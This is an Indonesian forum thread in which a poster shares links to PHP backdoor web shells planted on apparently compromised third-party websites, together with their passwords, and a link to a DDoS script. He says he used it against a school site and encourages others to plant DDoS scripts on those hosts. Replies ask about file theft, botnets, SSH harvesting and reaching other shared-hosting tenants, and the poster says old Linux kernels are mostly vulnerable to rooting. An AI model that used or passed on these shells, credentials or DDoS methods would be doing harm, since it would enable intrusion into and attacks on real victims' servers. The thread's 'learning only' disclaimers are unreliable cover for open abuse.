KASKUS

Quote:Original Posted By SuryaAdtmaja
ini contoh dari shell backdoor : http://www.adigi.fi/tmp/shell.php
contoh shell backdoor lagi : http://www.neocenter.pl/images/stori...s/pscript3.php
pass : idca .
agan yang mau ddos web bisa di tanam script html ddos di web di atas ^

contoh shell buatan saya : http://gaklimdo.com/media/syste/gakindo.php
pass : rahasia
ini hanya untuk pembelajaran ya gan , di mohon untuk mendeface web tersebut / menghancurkan web tersebut

ini contoh script DDOS http://romantic-passion.pl/fuck.html
sebagai contoh saya ngirim ddos ke web sekolahan ya , tapi jangan di contoh ini hanya contoh semata
agan pasti bisa menggunakan nya

Tutorial di thread ini hanya di gunakan untuk ajang pembelajaran semata, tolong jangan merusak / membuat untuk tindak kejahatan

@agan SuryaAdtmaja: bagi script ddosnya dong
Quote:Original Posted By dewasekarat
zaman skrg susah gan cari server hostingan yang lugu

klo pepes udah mainstream, tanam backdoor tanam script ddos, cuma jarang sekali server yg kasih jalan ngirim paket data yg besar

bagi script DDoSnya dong gan ,dan juga cara upload ke web hostingnya
itu tinggal CTRL+U gan ,
cara upload silahkan upload di hostingan anda ,
namakan misal nya , ganteng.html , Done ,
kalo masih kurang mantep, nanti ane cari yang laen
bah keliatannya TS pedagang pepes propesional nih

mau tanya om:

1. selain untuk pepes, nyolong file, sama untuk dijadiin botnet, ada kegunaan lain gak dari nanem beginian?

2. kalau udah ditanemin, apa bisa nyari informasi SSH? asumsikan www-data enggak punya akses ke file passwd/shadow dan kawan-kawannya.

3. untuk shared hosting, apakah ini bisa dipakai untuk ngakses file penyewa hostingan yg lain?
Quote:Original Posted By SuryaAdtmaja
itu tinggal CTRL+U gan ,
cara upload silahkan upload di hostingan anda ,
namakan misal nya , ganteng.html , Done ,
kalo masih kurang mantep, nanti ane cari yang laen

agan nyerang web sekolahan tumbang gak tuh? pake brp PC?,kalau memang mantap lngsung ane gunain deh
ada tutorialnye ga gan?
ane pengen belajar jg nih
thx
Quote:Original Posted By Unyunimous
bah keliatannya TS pedagang pepes propesional nih

mau tanya om:

1. selain untuk pepes, nyolong file, sama untuk dijadiin botnet, ada kegunaan lain gak dari nanem beginian?

2. kalau udah ditanemin, apa bisa nyari informasi SSH? asumsikan www-data enggak punya akses ke file passwd/shadow dan kawan-kawannya.

3. untuk shared hosting, apakah ini bisa dipakai untuk ngakses file penyewa hostingan yg lain?


enggak gan ane cuman newbie
waduh untuk yang laen2 gak enak gan di bahas di kaskus, ini kan bukan forum underground, ane hanya ngeshare tutorial PHP backdoor jadi untuk yang itu gak bisa disini gan , jawaban . no 1 dan 2 bisa gan, kallo kita jadi Root , tutorial rooting server ada di google

jawaban no 3 , seperti nya susah gan untuk hostingan bagus, kalo untuk hostingan abal-abal mungkin bisa
Quote:Original Posted By JinganDancq
ada tutorialnye ga gan?
ane pengen belajar jg nih
thx


tutorial apa gan ??

Quote:Original Posted By ilhambagas

agan nyerang web sekolahan tumbang gak tuh? pake brp PC?,kalau memang mantap lngsung ane gunain deh


ane gak nge destroy kok gan
Quote:Original Posted By SuryaAdtmaja


enggak gan ane cuman newbie
waduh untuk yang laen2 gak enak gan di bahas di kaskus, ini kan bukan forum underground, ane hanya ngeshare tutorial PHP backdoor jadi untuk yang itu gak bisa disini gan , jawaban . no 1 dan 2 bisa gan, kallo kita jadi Root , tutorial rooting server ada di google

jawaban no 3 , seperti nya susah gan untuk hostingan bagus, kalo untuk hostingan abal-abal mungkin bisa


underground atau bukan, security kan permasalahan global

uwidih...nomer 2 itu apa semua OS vulnerable om? ngeri
Quote:Original Posted By Unyunimous


underground atau bukan, security kan permasalahan global

uwidih...nomer 2 itu apa semua OS vulnerable om? ngeri


gak semua sih om, banyak yang vulnerable juga , kalo untuk linux server kernel di bawah 2009 rata2 sih vuln , selain linux ane belum pernah nyoba .
Quote:Original Posted By SuryaAdtmaja


ane gak nge destroy kok gan


Oh iy gan,ngomong2 backdoor utk DDoS yg mau dkirim ke ane mana?
boleh juga nih sih agan skillnya.
mari gan kita sama2 #OP
*ifyouknowwhatimean